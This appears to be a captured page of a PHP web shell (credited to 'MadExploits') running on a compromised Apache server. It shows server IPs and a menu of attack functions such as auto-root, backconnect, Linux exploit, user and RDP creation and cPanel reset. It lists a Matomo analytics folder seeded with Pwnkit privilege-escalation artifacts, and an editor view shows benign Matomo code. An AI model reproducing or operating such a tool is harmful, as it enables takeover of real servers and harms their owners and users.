Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.149.214.43
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
analytics /
core /
Columns /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
Join
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
ComputedMetricFactory.php
1.28
KB
-rw-r--r--
Dimension.php
27.2
KB
-rw-r--r--
DimensionMetricFactory.php
4.83
KB
-rw-r--r--
DimensionSegmentFactory.php
5.51
KB
-rw-r--r--
DimensionsProvider.php
1.51
KB
-rw-r--r--
Discriminator.php
1.73
KB
-rw-r--r--
Join.php
989
B
-rw-r--r--
MetricsList.php
5.88
KB
-rw-r--r--
Updater.php
14.86
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Join.php
<?php /** * Matomo - free/libre analytics platform * * @link https://matomo.org * @license http://www.gnu.org/licenses/gpl-3.0.html GPL v3 or later * */ namespace Piwik\Columns; use Exception; /** * @api * @since 3.1.0 */ class Join { private $table; private $column; private $targetColumn; /** * Join constructor. * @param $table * @param $column * @param $targetColumn * @throws Exception */ public function __construct($table, $column, $targetColumn) { $this->table = $table; $this->column = $column; $this->targetColumn = $targetColumn; } /** * @return string */ public function getTable() { return $this->table; } /** * @return string */ public function getColumn() { return $this->column; } /** * @return string */ public function getTargetColumn() { return $this->targetColumn; } }
Close